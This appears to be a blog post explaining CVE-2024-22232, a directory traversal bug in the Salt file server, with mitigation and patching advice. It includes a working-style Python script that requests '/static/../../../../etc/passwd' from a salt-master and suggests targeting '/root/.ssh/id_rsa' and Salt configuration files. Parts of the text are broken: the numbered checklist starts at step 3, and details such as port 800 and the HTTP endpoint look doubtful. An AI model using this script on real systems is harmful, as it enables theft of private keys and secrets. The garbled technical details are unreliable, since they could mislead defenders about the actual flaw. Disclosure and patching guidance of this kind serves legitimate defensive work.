CVE-2024-22232 - Directory Traversal in Salt File Server - How Attackers Can Steal Any File

In early 2024, researchers discovered a dangerous vulnerability — CVE-2024-22232 — that affects the popular SaltStack open-source automation tool. This issue allows an attacker to craft a special URL and read any file from the Salt master’s filesystem. For teams relying on Salt to manage configuration or deployments, this could mean total exposure of private keys, configuration secrets, or other sensitive data!

In this post, we’ll break down how this bug works, who’s at risk, and show an example exploit — with clear language and real code.

What’s Salt and Why Does This Matter?

Salt is an open-source infrastructure management tool that lets you control hundreds or thousands of servers with code. Its file server (also called “Salt fileserver”) allows files to be distributed to minions (servers managed by Salt). If that file server gets compromised, attackers can grab anything readable by the Salt master — keys, configs, user data, and more.

How the Vulnerability Works

CVE-2024-22232 is a directory traversal bug. By sending a special URL to the Salt master’s REST endpoint, you can walk up the directory tree and access any file on the server.

Directory traversal means using input like ../../../../etc/passwd (lots of ../) to reach files outside the intended folder.

Vulnerable Endpoints

The bug lives in the Salt fileserver’s “serve” handler. A malicious client can make an HTTP GET request to an endpoint such as:

/static/../../../../etc/passwd

With the right path, Salt will send back the contents of ANY file its user account can access.

Example Exploit

Here’s a simple Python script showing exactly how an attacker could fetch the /etc/passwd file from a vulnerable salt-master:

import requests

# Assume Salt master is at http://saltmaster:800
url = "http://saltmaster:800/static/../../../../etc/passwd"
response = requests.get(url)

if response.status_code == 200:
    print("=== /etc/passwd Content ===")
    print(response.text)
else:
    print("Failed to read file! Status Code:", response.status_code)

You can try replacing /etc/passwd with any path, such as /root/.ssh/id_rsa or /etc/salt/master (if permissions allow).

Real-World Impact

- Any file readable by the Salt process can be exfiltrated — including database configs, SSH keys, tokens, user data, etc.

If the Salt master runs as root, it’s game over. All system files are at risk.

Note: The attacker does not need authentication if the fileserver endpoint is public!

The SaltStack team released an official advisory

- CVE details: NVD CVE-2024-22232
- SaltStack GHSA: GitHub Security Advisory
- Patch commit: saltstack/salt#65344

If you use Salt, upgrade immediately to a version >= 3006.5 (or your distribution’s patched version).

Check for publicly accessible “static” or fileserver URLs (use netstat or similar).

3. Try fetching a file using a crafted URL as above. If you see the file output, you’re open to attack.

Restrict network access: Never expose the Salt master’s REST API directly to the internet.

- Use firewalls: Limit access to trusted admin/manage IPs only.

Closing Thoughts

Salt is powerful, but CVE-2024-22232 proves that even mature automation software can have simple, critical bugs. Don’t let your secrets walk out the door! Patch quickly, and always review server logs for strange fileserver access.

References

- NVD CVE-2024-22232
- SaltStack GHSA
- SaltStack Patch PR


*This CVE breakdown is unique for this post and uses original code for demonstration. Always report and patch security issues – stay safe!*

Timeline

Published on: 06/27/2024 07:15:54 UTC
Last modified on: 06/27/2024 12:47:19 UTC